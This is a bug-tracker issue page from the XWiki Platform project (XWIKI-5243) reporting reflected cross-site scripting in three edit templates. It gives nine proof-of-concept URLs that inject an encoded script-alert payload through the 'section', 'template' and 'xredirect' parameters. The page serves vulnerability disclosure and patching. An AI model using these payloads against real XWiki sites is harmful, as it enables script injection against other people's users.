Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-5243

Reflected XSS in edit(wiki|wysiwyg|wysiwygnew).vm

    XMLWordPrintable

Details

    • security, xss, patch
    • Integration
    • Trivial

    Description

      Exactly the same mistakes in all 3 templates. Injection via "section", "template" and "xredirect" example:

      http://localhost:8080/xwiki/bin/view/Main/Test?xpage=editwiki&section=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
      http://localhost:8080/xwiki/bin/view/Main/Test?xpage=editwiki&template=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
      http://localhost:8080/xwiki/bin/view/Main/Test?xpage=editwiki&xredirect=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
      
      http://localhost:8080/xwiki/bin/view/Main/Test?xpage=editwysiwygnew&section=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
      http://localhost:8080/xwiki/bin/view/Main/Test?xpage=editwysiwygnew&template=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
      http://localhost:8080/xwiki/bin/view/Main/Test?xpage=editwysiwygnew&xredirect=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
      
      http://localhost:8080/xwiki/bin/view/Main/Test2?xpage=editwysiwyg&section=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
      http://localhost:8080/xwiki/bin/view/Main/Test2?xpage=editwysiwyg&template=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
      http://localhost:8080/xwiki/bin/view/Main/Test2?xpage=editwysiwyg&xredirect=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
      

      Attachments

        Issue Links

          Activity

            People

              nickless Alex Busenius
              nickless Alex Busenius
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: